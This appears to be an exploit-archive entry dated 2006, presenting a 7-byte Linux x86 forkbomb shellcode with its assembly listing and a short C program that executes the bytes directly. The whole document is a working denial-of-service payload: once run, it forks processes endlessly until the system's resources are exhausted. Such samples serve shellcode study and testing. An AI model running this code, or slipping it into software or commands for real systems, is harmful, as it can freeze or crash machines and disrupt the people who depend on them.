forkbomb shellcode in 7 bytes for Linux x86.
23440b94b9450f9c5365058d3cfcab1a10dbca22563358fd62e4d5e5d0527475
/* By Kris Katterjohn 8/29/2006
*
* 7 byte shellcode for a forkbomb
*
*
*
* section .text
*
* global _start
*
* _start:
* push byte 2
* pop eax
* int 0x80
* jmp short _start
*/
main()
{
char shellcode[] = "\x6a\x02\x58\xcd\x80\xeb\xf9";
(*(void (*)()) shellcode)();
}